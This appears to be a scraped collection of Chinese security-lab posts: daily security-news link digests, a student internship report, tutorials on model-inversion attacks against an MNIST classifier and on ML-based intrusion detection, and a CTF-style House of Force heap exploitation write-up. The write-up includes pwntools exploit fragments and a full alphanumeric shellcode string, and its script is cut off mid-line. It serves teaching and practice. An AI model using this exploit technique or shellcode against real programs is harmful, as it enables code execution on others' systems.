免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、美国风投公司ATV披露勒索软件攻击和数据泄露 https://securityaffairs.co/wordpress/120816/data-breach/advanced-technology-ventures-ransomware-attack.html 2、美国CISA 和 NSA 发布了加固 Kubernetes 部署的指南 https://securityaffairs.co/wordpress/120807/security/kubernetes-guidance.html 3、INFRA:HALT 中TCP/IP库漏洞影响上百家供应商的OT设备 https://securityaffairs.co/wordpress/120781/hacking/infrahalt-ot-devices.html 4、谷歌发布92版本修补 Chrome 多个高危漏洞 https://www.securityweek.com/google-patches-several-chrome-flaws-can-be-exploited-malicious-extensions 5、研究人员通过 Nasnos 漏洞远程控制酒店房间的灯光、通风等设施 https://threatpost.com/security-bugs-takeover-capsule-hotel/168376/ 6、 Apache Hadoop YARN错误配置导致被用于恶意挖矿 https://cyware.com/news/misconfigured-apache-hadoop-yarn-exploited-for-cryptomining-abdbd6b5 7、新的 Cobalt Strike 漏洞允许关闭攻击者的服务器 https://www.bleepingcomputer.com/news/security/new-cobalt-strike-bugs-allow-takedown-of-attackers-servers/ 8、研究人员称某开放的数据库泄露了美国3500万公民信息 https://www.hackread.com/household-data-database-us-residents-exposed/ 9、社会工程自动化：TG上的机器人可以诱骗你提供OTP动态口令 https://cybernews.com/security/new-robocall-bot-on-telegram-can-trick-you-into-giving-up-your-password/ 10、Python 恶意包窃取 Discord 令牌 https://cyware.com/news/python-packages-stealing-discord-tokens-and-much-more-429ec854

为促进网络安全人才队伍建设，提升网安人才专业实操技能，加快学生就业岗位方向的认知及熟悉企业日常运作流程，让学生了解网络安全相关岗位技能，并实际体验安全问题的分析思路和分析过程，在工作实践中能直接应用操作与演示的内容，全面提升学生就业竞争力，由蚁景科技与中南大学共同组织的该校计算机学院信息安全专业大三学生的实习实训工作于2021年7月5日-23日在湖南蚁景科技有限公司（下文称蚁景科技）顺利开展。本次实习实训由蚁景科技提供场地与师资，中南大学计算机学院18级信安专业44名学生参加了此次实习实训。 实践场景 本次实习实训企业导师由蚁景科技安全工程师担任，对学生进行任务安排与教学辅导；导师们还设置了每周学习心得分享，让学生们在输入+输出+反馈的过程中，充分吸收所学知识并学以致用。 实践分享 朝九晚五的生活令同学们充分体验到了作为企业员工的上班常态；从同学们的周报可以反馈出此次实训安排的任务（包括各类工具使用、解析各类安全问题思路等等）都是需要较强实操能力的，同学们纷纷感慨在今后的学习过程中需要多去动手实践。 学生周报心得 在实习实训的总结会中，中南大学领导和蚁景科技相关负责人在会上分别做了讲话，并认真听取了学生代表们对此次实习实训的心得体会和总结报告。会上还对优秀学员进行了表彰，至此2021中南大学信息安全专业学生实习实训画上了圆满的句号。 获奖表彰 实训大合影 本次实习实训是蚁景科技与中南大学又一次深度合作，蚁景科技希望以此次实习实训为契机，与中南大学能在教学教改、精品课程、打造名师、教材开发、毕业设计等方面展开进一步合作。 最后希望同学们以梦为马，不负韶华，都能实现自己的梦想！ 蚁景科技已联合多个高校开展此类实习实训活动，在实训内容准备及实训实施方面有着丰富的经验，未来期待更多高校加入我们。

#前言 AI在生活中已经无处不在了，不论是高铁、机场的人脸识别还是指纹支付、语音助手等，都内置了AI技术。随着一项技术逐渐发展成熟，其安全风险就需要被考虑了。可能大家谈到AI安全的时候，最熟悉的就是对抗样本攻击，其本质是通过修改输入样本，来欺骗模型做出误分类的结果，这其实是属于模型安全领域。 事实上在谈及AI安全的时候，还有一个细分领域就是隐私安全，比如怎么保护数据不被泄露和模型逆向攻击。模型逆向攻击可以从模型中恢复出训练数据，如果此方案应用于人脸识别模型，恢复出人脸来，其危害是非常大的。 本文将会介绍模型逆向攻击的原理及其实现，并在基于MNIST训练的得到的CNN模型上进行攻击，最后成功复现，恢复出0~9的数字图像。此外，在文中代码复现部分，还会给出作者在复现论文算法时的一些经验，希望可以给大家带来启发。  #区分 除了模型逆向攻击以外，还有种攻击手段叫做模型提取攻击，看起来很相近，却是完全不同的两类攻击类型。 模型提取攻击是攻击者希望可以在本地恢复出目标模型，也就是说其攻击目的是窃取模型，我们知道大公司训练模型花了很大的资源的，不论是数据标注的人力成本还是训练模型花费的算力成本，大公司训练模型然后通过开放API查询接口，通过提供MLaaS来赚钱，如果攻击者能够窃取其模型，就是侵犯了其知识产权，影响其正常业务。攻击的示意图如下所示：  而模型逆向攻击是攻击者希望在不知道训练数据的情况下，通过推理得到训练数据，也就是说其攻击目的是为了得到隐私数据，可见两者区别是非常大的。 模型逆向攻击的效果如下所示：  这是Fredrikson等人做的实验结果，针对人脸识别系统，从其中恢复出训练数据集里的人人脸。上图中右边的图是通过攻击得到的人脸，右边的图是训练集中原来的人脸，可以看到，尽管存在一定差异，但是基本一致，说明该方案是可行的。我们就以Fredrikson等人为例，在理解了模型逆向攻击的原理后，根据论文中给出的算法进行复现，并针对MNIST数据集进行攻击。  #原理 我们要恢复的是训练集样本，而样本都是图像，图像是由像素组成的，其本质是由不同的像素强度组合起来得到的，所以我们要通过攻击得到训练集中的图像，本质上是要逆向的特征是构成图像的像素强度的完整向量，每个强度对应于 [0, 1] 范围内的浮点值。 我们假设攻击者知道他试图推断的向量中任何像素的确切值。假设具有n个分量和m个类别的特征向量，我们可以将分类器建模为以下函数：  我们知道模型的输出是一个概率值向量，其中第 i 个分量对应于特征向量属于第 i 类的概率。我们将输出的第i个分量记作：  我们使用梯度下降来最小化涉及f~的损失函数，以进行模型逆向攻击。梯度下降通过迭代地将候选解向候选解的梯度的负值进行变换，来找到可微函数的局部最小值。攻击算法如下所示：  首先根据面部识别模型定义一个损失函数c和一个特定于具体情况的函数AuxTerm，它会把任何可用的辅助信息添加到成本函数中，比如当我们在对面部去模糊时就会将其实例化。 接着使用大小为λ的梯度步长对最多α次迭代应用梯度下降。在梯度下降的每一步之后，得到的特征向量被提供给一个后处理函数 Process，它可以根据攻击的需要执行各种图像处理，例如去噪和锐化。 如果候选者的损失函数在β次迭代中未能提高，或者成本至少与γ一样大，则下降终止并返回最佳候选者，此时就得到通过模型逆向攻击恢复出的训练集样本。 该方案要求可以计算得到梯度，在我们下一部分复现的时候，对于梯度消失的情况我们的攻击就失效了。  #模型逆向攻击实战 ##搭建模型 我们搭建一个标准的CNN模型：  并进行训练：   ##模型逆向代码实现 前面说过，我们的代码是基于《Model Inversion Attacks that Exploit Confidence Information and Basic Countermeasures》实现的，文中提出的算法是针对人脸识别模型进行攻击的，但是对于会给出梯度的其他分类器模型也是可行的，我们就会在实现论文提出的算法后将其应用于MNIST数据集。 MIFace类中关键的方法是infer，其需要接受初始化样本，如果不指定则默认用全零的数组作为初始输入，代码如下：  上面代码中很多都是用于处理数据格式、转换等问题的，关键的部分在红圈里面：  其对应的就是我们在上一部分介绍的论文给出的算法实现：  如果没有论文复现经验的话，看到这里大概已经清楚论文给出的算法和实际实现的算法还是有一定出入的。最明显的区别是论文会抽象出最本质的算法思想，而具体编程语言细节、数据处理细节并不关心，自己在复现的时候就需要注意这些细节；其次，可能论文要处理的问题和我们复现者要处理的问题不同，所以在理解清楚核心算法后自己在实现时需要结合实际情况，不应该全部照搬。 以损失函数的定义为例（第2行），论文给出的损失函数还有一项是AUXTERM(x)，根据论文介绍，这是一个case-specific的函数，也就是说在不同case下，具体实现是不同的，它会把可用的信息加入成本函数中，辅助攻击，但是作者在做人脸去模糊的时候才给出了该函数的一个实例。此外，文中也说明了，如果没有辅助信息可用，则应该对所有x，直接定义AUXTERM(x)=0。因此，我们在实现的时候，可以直接略去这一项。  接下来应用MIFace执行攻击  我们的攻击目标是希望恢复出训练集中的样本，我们知道MNIST数据集中共有10类，从0到9，我们希望每种类别都可以恢复出来   ##攻击 不同的初始设置也会对攻击结果有影响，我们可以分别实验一下。 以全白的图像为初始样本开始发动攻击：  从上图的结果可以看到，可以看到在全白的图像上出现了gradient vanish的问题（即梯度消失问题），所以攻击是失败的。 再尝试以全黑的图像作为初始化样本：  有了前面的教训，我们这次先来打印梯度，确保没有梯度消失的情况：  然后发动攻击：  把结果可视化：  上面就是模型逆向攻击得到的图片，其实对于人类来说并没有明显的数字的特征。  那么我们不要取全黑，也不要全白，用居中的灰图作为初始样本：  同样先检查其梯度，确保没有梯度消失问题：  接下来发动攻击：  查看模型推理结果：  从上图的结果可以看到，从左到右，从上到下，隐约有0~4,5~9的轮廓了，说明攻击还是可行的。  我们再来看看以随机的图像作为初始样本会怎样：  首先检查其梯度，确保存在：  发动攻击：  可视化结果：  这次推理得到的结果也比较差，几乎看不出来0~9的样子。  全黑、全白、居中的灰图以及随机生成的样本都用作初始化了，其中灰图比较好。那么有没有更好的办法呢？ 回顾下模型逆向攻击的假设，攻击者希望推理出训练集中的样本，但是他是知道测试集的样本的，我们前面的几次攻击都没有利用这一先验知识。那么我们可以考虑将测试集样本求个平均，然后作为模型逆向攻击的初始样本：  确保梯度存在：  发动攻击：  可视化模型逆向攻击的结果：  每张图片基本都可以看到对应类别数字的轮廓了，说明模型逆向攻击成功了。 通过这五组对比实验，给我们的启发是在进行攻击时，要时刻注意攻击的前提、场景以及对攻击者能力的假设，并利用好先验知识，这样能更好地实施攻击。  #参考 1.Model Inversion Attacks that Exploit Confidence Information and Basic Countermeasures 2.Algorithms that remember: model inversion attacks and data protection law 3.Improved Techniques for Model Inversion Attacks 4.Stealing Machine Learning Models via Prediction APIs 5.Model Extraction Attacks and Defenses on Cloud-Based Machine Learning Models 6.https://github.com/google-research/cryptanalytic-model-extraction 7.https://github.com/cake-lab/datafree-model-extraction 8.https://github.com/ftramer/Steal-ML

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、思科修复 Firepower 设备管理 (FDM) On-Box 软件的RCE漏洞 https://securityaffairs.co/wordpress/120761/security/cisco-firepower-device-manager.html 2、研究人员发现 PyPI GitHub Actions中潜在的远程代码执行 https://securityaffairs.co/wordpress/120755/hacking/pypi-potential-rce.html 3、谷歌修补高危安卓安全漏洞 https://www.securityweek.com/google-patches-high-risk-android-security-flaws 4、NIST 正在研究和制定 AI 风险管理框架 https://www.careersinfosecurity.com/nist-works-to-create-ai-risk-management-framework-a-17193 5、根据研究数据针对小公司的勒索攻击越来越多 https://www.helpnetsecurity.com/2021/08/03/ransom-demands/ 6、意大利拉齐奥地区疫苗登记系统因勒索软件攻击而瘫痪 https://www.nbcnews.com/tech/tech-news/italian-vaccine-registration-system-down-apparent-ransomware-attack-n1275757 7、泰国疫苗预约登记平台泄露超过2万名申请人的信息 https://thethaiger.com/coronavirus/foreigners-able-to-register-on-vaccine-site-despite-data-leaks-glitches 8、法国情报机构证实在记者的手机上发现 Pegasus 间谍程序 https://www.theguardian.com/news/2021/aug/02/pegasus-spyware-found-on-journalists-phones-french-intelligence-confirms 9、韩发现利用PDF附件的电邮攻击 疑似朝鲜所为 https://www.zaobao.com/realtime/world/story20210803-1177252 10、5000万条公民信息在“暗网”被倒卖 15名犯罪嫌疑人被捕 https://finance.sina.com.cn/money/lczx/2021-08-03/doc-ikqcfncc0552006.shtml

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、PTS 系统中的 PwnedPiper 漏洞影响 80% 的美国医院 https://securityaffairs.co/wordpress/120741/hacking/pwnedpiper-flaws-pts-systems.html 2、研究人员发现 DarkSide 勒索软件团伙已更名为 BlackMatter https://securityaffairs.co/wordpress/120732/cyber-crime/darkside-blackmatter-ransomware-similarities.html 3、亚马逊因数据隐私被卢森堡罚款 7.46 亿欧元 https://www.securityweek.com/amazon-fined-746-mn-euros-luxembourg-over-data-privacy 4、NSA 针对政府雇员发布公共场合使用无线设备的安全指南 https://www.securityweek.com/nsa-shares-guidance-government-employees-securing-wireless-devices-public 5、Cisco、Sonatype 和其他公司加入开源安全基金会 https://www.securityweek.com/cisco-sonatype-and-others-join-open-source-security-foundation 6、Zoom 已同意以 8500 万美元和解美国隐私诉讼 https://www.securityweek.com/zoom-settle-us-privacy-lawsuit-85-mn 7、新的 APT 组织利用 ASP.NET 漏洞攻击 Microsoft IIS 服务器 https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html 8、Chipotle 的电子邮件营销帐户被黑以传播恶意软件 https://www.securityweek.com/chipotles-email-marketing-account-hacked-spread-malware 9、研究人员找到了绕过PrintNightmare漏洞补丁的新方法 https://www.bleepingcomputer.com/news/microsoft/remote-print-server-gives-anyone-windows-admin-privileges-on-a-pc/ 10、微软宣布其WAF的机器人保护功能已全面可用 https://www.bleepingcomputer.com/news/security/bot-protection-now-generally-available-in-azure-web-application-firewall/

实验环境 https://www.yijinglab.com/cour.do?w=1&c=CCIDb18d-7cf9-4ba4-b75e-ed7aff569e3f背景介绍 1、 House of force是利用早期glibc库进行堆分配时存在的缺陷，从而对内存进行任意写的攻击方式。当初次申请堆块时，程序会映射一块较大的chunk作为top chunk，之后再进行申请时如果堆块较小，将从这个top chunk切分出合适的块，剩下的部分形成新的top chunk。而house of force就是利用了形成新top chunk时简单将原地址加上切分大小的缺陷，使得该top chunk被移动到任意位置，从而在下一次malloc时产生任意写的问题。 要利用这一漏洞，需要程序存在堆溢出问题，能够覆写top chunk的size段。同时，还要求能确定目标地址与堆地址的偏移量，以便于top chunk能移动至目标位置。 2、 字符串shellcode指的是由可见字符构成的shellcode。举例而言，字母‘P’对应的十六进制为0x50，翻译成汇编指令为push %rax。可以使用alpha3等工具生成自定义shellcode。 题目分析 程序只有二进制文件，这里为了讲解方便，编译时保留了调试信息。首先查看保护机制：  32位程序，存在可读可写可执行段，代码段固定加载到0x8048000，不能修改got表。 执行程序，大致观察程序流程：   程序首先要求用户输入name，然后会返回输出name相关信息。进入循环，当用户输入S时允许进一步产生三次输入，当用户输入L时程序退出。除一开始的name以外，程序并不会输出用户之前输入过的信息。  接下来IDA查看函数入口：  其中prepare函数如下：  其中welcome函数用于输出treehole的banner。anymore函数用于读入一个字符，判断是否需要退出程序。readstr函数如下：   注意到该函数存在两个注意点：红圈内a2用于给定最大输入字符个数，但其类型为unsigned int，因此当传入-1时能引发过量写入。蓝圈内对字符大小做了限定，只允许输入ASCII码在32~126内的可见字符。 confusename函数定义如下：  其对指定的字符串做了一系列异或运算。 接下来的strncpy将ninput开始的0x50个字符拷贝到name处。使用ojbdump可以看出，name和ninput相邻，当name填满后printf会继续向后输出ninput的值，该值恰是堆上某chunk的地址。因此当输入的name超过50字节后，程序会泄露堆地址。 main函数使用的ptr是指向anymore函数的指针，该指针在bss段，可以在接下来的步骤中被修改，从而劫持函数控制流。 主要输入函数pourout代码如下：  首先读入一个int整数（readint函数简单使用atoi，此处略去不表），然后申请这个数字+4（4用于存放后面输入的一个int）大小的块，并向这个块写入该大小指定的字符。然后读入一个int，并将它紧靠用户输入的字符串放入块中。 漏洞利用点就在于如果readint读入一个负数（如-1），将会申请到一个最小块，然后允许用户过量写入（前文提到，readstr的长度判断存在unsigned int的问题）。readint此处实现了对可见字符这一限定的绕过，从而等价于允许用户输入最多4字节的任意字符。 那么题目的思路便可以总结为： 1、 调整top chunk到ptr附近 2、 通过申请块时的readint，修改ptr为目标代码指针 3、 利用RWX的漏洞，事先写入字符串shellcode，在第2步中使用  如何调整top chunk呢？根据32位程序chunk的8字节对齐原则，只需要利用程序存在的-1任意写问题，即可产生堆溢出问题，修改top chunk的prev_size段，并使用readint来输入0xfffffff（即-1），程序如下： io.sendline('S')io.sendlineafter('wanna say?', '-1')io.sendlineafter('secrets...','A'*12)io.sendlineafter('do you like?','-1') 则达到的效果为：  红圈内为用户申请到的chunk，可见其后的top chunk的size被修改为0xffffffff，则下一次申请时可以绕过对chunk大小的验证。  这里为什么一定要绕过这一验证呢？因为ptr位于bss段，其地址低于top chunk。当malloc一个块时，如果使用top chunk，会首先检查其大小是否合适，然后将top chunk的地址加上块的大小，来实现top chunk的移动。如果想让top chunk重定向到小地址，需要malloc一个负数，而负数在unsigned int翻译时会成为大正数，不再使用top chunk切分，而是直接在libc加载地址前使用mmap映射。如果将top chunk修改为0xffffffff，能使得chunk的分配采用切分top chunk的方式，从而将top chunk向低地址移动。  接下来可以再申请块，将大小设定为目标地址减去top chunk地址，实现top chunk的移动。这里可以将目标地址设定为ptr-0x10，则可以使得chunk head后直接readint输入shellcode地址即可实现修改ptr，劫持控制流。 # move top chunk to .bss sectionfunc_ptr = 0x804b090 -0x10target_addr = func_ptr - 4current_addr = heap_base + 0x278io.sendline('S')io.sendlineafter('wanna say?', str(target_addr-current_addr))io.sendlineafter('secrets...','B'*12)io.sendlineafter('do you like?','-1')  因此需要准备好shellcode。这里可以从网上搜索到32位程序的一条字符串shellcode： PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJTKV8MIPR2FU86M3SLIZG2H6O43SX30586OCRCYBNLIM3QBKXDHS0C0EPVOE22IBNFO3CBH5P0WQCK9KQXMK0AA 直接正常输入即可。这里有两种放置方式，一种是放到ptr前，然后在当次填充中即可顺便修改ptr；一种是放到正常状态的堆里，然后再用一次malloc修改ptr。由于这里ptr在bss段的偏移是0x90，而shellcode长度147字节超过了0x90，所以采用了第一种方法。那么在第一次修改top chunk大小前，先填充这个shellcode即可。这也是之前的使用0x278的原因。  可见字符串shellcode如上所示。调整ptr到0x8eb61d0即可。（即heap_base+0x1d0） 运行脚本，最终攻击结果如下：  脚本完整代码如下。shellcode和调整top chunk的方法不唯一，这里只是列举其中一种情况。  from pwn import *from pwn import u32 io = process('./a.out')context.terminal = ['tmux','splitw','-h']# context.log_level = 'debug'# gdb.attach(io, 'b main')def leak_heap_base():    name = b'A'*100    io.sendlineafter('tell me your name:',name)    raw = io.recvuntil('Enjoy')    rawbase = raw[raw.fin  'PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJTKV8MIPR2FU86M3SLIZG2H6O43SX30586OCRCYBNLIM3QBKXDHS0C0EPVOE22IBNFO3CBH5P0WQCK9KQXMK0AA'shellcode_func = heap_base + 0x1d0io.sendline('')io.sendline('S')io.sendlineafter('wanna say?', str(len(shellcode)))io.sendlineafter('secrets...',shel

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、黑客泄露了从 EA 窃取的数据，包括 FIFA 代码 https://securityaffairs.co/wordpress/120711/data-breach/ea-stolen-data-leaked.html 2、美司法部警告称SolarWinds 黑客入侵了 27 个州检察官办公室 https://securityaffairs.co/wordpress/120704/cyber-warfare-2/solarwinds-hackers-breached-state-attorneys-offices.html 3、恶意软件Meteor针对伊朗国家铁路系统 https://securityaffairs.co/wordpress/120679/malware/meteor-wiper-irans-national-railway.html 4、Node.js发布更新修复了一个高危漏洞 https://www.bleepingcomputer.com/news/security/nodejs-fixes-severe-http-bug-that-could-let-attackers-crash-apps 5、研究报告称2021年上半年勒索软件攻击猛增达3亿次以上 https://www.zdnet.com/article/ransomware-attack-volume-sets-record-reaches-more-than-300-million-for-first-half-of-2021-sonicwall 6、Linux eBEF 高危提权漏洞CVE-2021-3490 PoC在线发布 https://securityaffairs.co/wordpress/120688/hacking/cve-2021-3490-linux-kernel-bug.html 7、Python 团队修复了允许接管 PyPI 存储库的漏洞 https://therecord.media/python-team-fixes-bug-that-allowed-takeover-of-pypi-repository/ 8、Moodle电子学习平台的RCE漏洞可被用于窃取数据 https://portswigger.net/daily-swig/finders-cheaters-rce-bug-in-moodle-e-learning-platform-could-be-abused-to-steal-data-manipulate-results 9、网络钓鱼活动使用非传统策略窃取PayPal凭据 https://cofense.com/blog/paypal-live-chat-phish/ 10、WordPress下载管理器插件修复了一个RCE漏洞 https://www.securityweek.com/remote-code-execution-flaws-patched-wordpress-download-manager-plugin

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Microsoft Hyper-V 中的严重漏洞可导致 RCE 和 DoS https://securityaffairs.co/wordpress/120654/hacking/critical-microsoft-hyper-v-bug.html 2、黑客利用IE浏览器漏洞在目标 PC 上部署 VBA 恶意软件 https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html 3、新的 Android 恶意软件使用 VNC 来监视和窃取密码 https://thehackernews.com/2021/07/new-android-malware-uses-vnc-to-spy-and.html 4、Praying Mantis 现在正在攻击微软的 IIS 服务器 https://cyware.com/news/praying-mantis-is-now-preying-on-microsofts-iis-servers-36788559 5、分析发现XAMPP被用于服务Agent Tesla和Formbook https://www.riskiq.com/blog/external-threat-management/agent-tesla-xampp/ 6、黑客冒充健美操教练用恶意软件攻击国防承包商 https://www.hackread.com/hackers-malware-aerospace-defense-contractor/ 7、研究人员发现多个网络摄像机供应商使用的固件中存在严重漏洞 https://www.securityweek.com/serious-vulnerabilities-found-firmware-used-many-ip-camera-vendors 8、北爱尔兰在数据泄露后暂停疫苗护照系统 https://www.bleepingcomputer.com/news/security/northern-ireland-suspends-vaccine-passport-system-after-data-leak/ 9、安卓证书窃取恶意软件UBEL在野活跃 https://thehackernews.com/2021/07/ubel-is-new-oscorp-android-credential.html 10、最高法：禁止滥用人脸识别，新规定8月1日起施行 http://www.court.gov.cn/fabu-xiangqing-315851.html

#前言 目前大量物联网设备及云服务端直接暴露于互联网，这些设备和云服务端存在的漏洞（如：心脏滴血、破壳等漏洞）一旦被利用，可导致设备被控、用户隐私泄露、云服务端数据被窃取等安全风险，甚至会对基础通信网络造成严重影响。为了促进物联网领域的安全研究，研究人员制作了UNSW-NB15数据集，这是一个基于物联网的网络流量数据集，对正常活动和恶意攻击行为进行了不同的分类。本文将基于该数据集，应用AI领域的典型技术，包括决策树、随机森林、逻辑回归、多层感知器等进行检测，希望师傅们可以从中了解AI技术应用于安全领域的典型流程，包括数据预处理、数据转换、交叉验证等，同时提升对物联网安全的新的认识。  #数据集 本次用到的数据集是UNSW-NB15，这是一个基于物联网的网络流量数据集，由新南威尔士大学堪培拉网络靶场实验室的 IXIA PerfectStorm工具创建，用于生成真实现代正常活动和合成当代攻击行为的混合数据集。 它们使用tcpdump 工具捕获 100 GB 的原始流量（例如 Pcap 文件）。  该数据集有九种类型的攻击，即 Fuzzers、Analysis、Backdoors、DoS、Exploits、Generic、Reconnaissance、Shellcode 和 Worms，当然为了方便大家使用，已经做了整理，把特征、标签都统计到了csv文件里。 如果希望详细了解该数据集的信息的话，可以参考[2][3][4]论文 该数据集中的一部分被做为训练集和测试集，即 UNSW_NB15_training-set.csv 和 UNSW_NB15_testing-set.csv。训练集中的记录数为 175,341 条记录，测试集中的记录数为 82,332 条记录，分别来自不同攻击类型、恶意和正常数据。  #数据预处理 导入所需库文件  数据集中的数据包括9种攻击类型，分别是Fuzzers, Analysis, Backdoors, DoS, Exploits, Generic, Reconnaissance, Shellcode和Worms。在csv文件最后的一列是标签，0代表郑，1代表攻击 加载训练数据UNSW_NB15_training.csv，检查前5行  可以看到前5行的记录都是正常的  加载数据后我们首先检测是否存在缺失值  面对存在缺失值的情况，最简单的方法就是直接启用包含缺失值的整行和整列  然后看看数据是否平衡，一方面是看9种攻击类型是否平滑（y1指代这方面的标签），一方面是看正常和恶意的数据量是否平衡（y2指代这方面的标签）  结果如下  可以看到数据集并不平滑，不过并不严重，我们继续往下分析  本来是需要手动拆分训练集和测试集的，不过UNSW_NB15已经拆分好了，比率为7:3 训练集和测试集分别在UNSW_NB15_training-set.csv 和 UNSW_NB15_testing-set.csv 如果需要手动拆分的话，使用下面的代码就可以了  我们加载测试集供后续使用   #数据转换 接下来需要转换数据 首先需要确定哪些列是分类数据（categorical）,哪些列是数值数据(numerical)（分类数据也叫qualitative data或是Yes/No data，是定性的，而数值数据是定量的）  分别将其打印   对于分类数据应用OneHotEncoder，将其编码为独热数值数组 对于数值数据应用StandardScaler，通过去除均值和缩放到单位方差来标准化 构造ColumnTransformer对象，在X_train上进行fit即可  每个transformer分别转换x，将结果拼接起来  对测试集也进行同样的处理  转换后的数据不再是dataframe结构，而是类似于数组的结构  我们同样还需要转换y1，y1中一共有9类  我们直接用LabelEncoder就可以了，其用于规范化标签，使处理对象仅包含0和类别数-1 之间的值  截止目前，数据部分已经处理完成了，接下来就是训练模型了  #交叉验证 我们训练模型后，会使用5折交叉验证（cross validation,CV）进行验证，评估模型的指标包括准确率、准确率、召回率、F1 分数、ROC 的 AUC 值；然后使用测试集评估模型看看效果如何 我们以逻辑回归分类器为例  查看交叉验证结果  因为是5折交叉验证，所以每个指标都有5组数据，基本上我们会使用平均值来衡量校验验证的评估结果 比如打印出平均的准确率  #模型测试 在测试集上进行测试  结果如下  precision是精确率，也称作查全率，等于tp/(tp+fp);这是针对我们预测结果而言的，它表示的是预测为正的样本中有多少是真正的正样本 recall是查准率，也称召回率，等于tp/(tp+fn)；这是针对我们原来的样本而言的，它表示的是样本中的正例有多少被预测正确了 从计算公式可以看出，其实就是分母不同，一个分母是预测为正的样本数，另一个是原来样本中所有的正样本数 如果看单个指标都过于片面，可以通过f1分数来评估模型性能，f1是recall和precision的加权平均，在上面可以看到在0.64左右  #其他机器学习方法 在sklearn已经实现了很多机器学习模型，我们只需要一条代码就可以换模型，除了逻辑回归之外，还可以试试决策树和随机森林  打印出模型的超参数  然后重复之前的步骤，来看看结果如何  可以看到，随机森林的效果是相对而言比较好的  #多层感知器 以上三个分类器都属于传统的机器学习方法，那么接着我们试试MLP，这是一种前向结构的神经网络。  结果如下  把这四种分类器放在一起看看哪种效果更好  可以看到随机森林的效果还是最好的。这也给我们一个提示，虽然现在深度学习、神经网络 是AI的最火热的技术，但是这并不意味着在所有任务上都是万能的，它们更大的优势是在处理海量数据、复杂任务上，对于一些基础的任务，可能传统的机器学习方法会有更好的效果。  相关实验：https://www.yijinglab.com/expc.do?ec=ECID4bd7-5a7d-4ee5-9ecd-1b35a7abfd92 #参考 1.https://www.unsw.adfa.edu.au/unsw-canberra-cyber/cybersecurity/ADFA-NB15-Datasets/ 2.UNSW-NB15: a comprehensive data set for network intrusion detection systems (UNSW-NB15 network data set). 3.The evaluation of Network Anomaly Detection Systems: Statistical analysis of the UNSW-NB15 dataset and the comparison with the KDD99 dataset 4.Novel geometric area analysis technique for anomaly detection using trapezoidal area estimation on large-scale networks 5.http://www.caict.ac.cn/kxyj/qwfb/bps/201809/P020180919390470911802.pdf 6.《机器学习》

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、美英澳网络安全机构联合报告发布过去两年最常被利用的漏洞 https://securityaffairs.co/wordpress/120644/hacking/top-routinely-flaws-exploited.html 2、IBM 数据泄露成本研究：数据泄露的平均成本超过 420 万美元 https://securityaffairs.co/wordpress/120627/data-breach/cost-of-data-breach-2021.html 3、BlackMatter 勒索软件组织声称是 Darkside 和 REvil 的继任者 https://securityaffairs.co/wordpress/120611/malware/blackmatter-ransomware.html 4、福昕修复 PDF 阅读器、编辑器中多个安全漏洞 https://www.securityweek.com/foxit-plugs-multiple-security-holes-pdf-reader-editor 5、有争议的PunkSpider工具将在DEFCON上推出新版 https://threatpost.com/punkspider-def-con-debate/168223/ 6、超过 100 名中国台湾政界人士和官员的 LINE 账户遭到黑客攻击 https://therecord.media/line-accounts-for-more-than-100-taiwanese-politicians-were-hacked 7、安天发布“幻鼠”组织针对我国的窃密攻击活动分析 https://mp.weixin.qq.com/s/JoohsUOJXbaEGaYZWv0pnw 8、新的LockBit勒索软件利用组策略加密Windows域 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/ 9、Cisco Talos 在CODESYS 开发系统中发现多个漏洞 https://blog.talosintelligence.com/2021/07/vuln-spotlight-codesys-.html 10、 F5 报告称过去五年发生的重大网安事件中有57%利用了Web安全漏洞 https://cyware.com/news/the-state-of-web-application-security-6e551dfc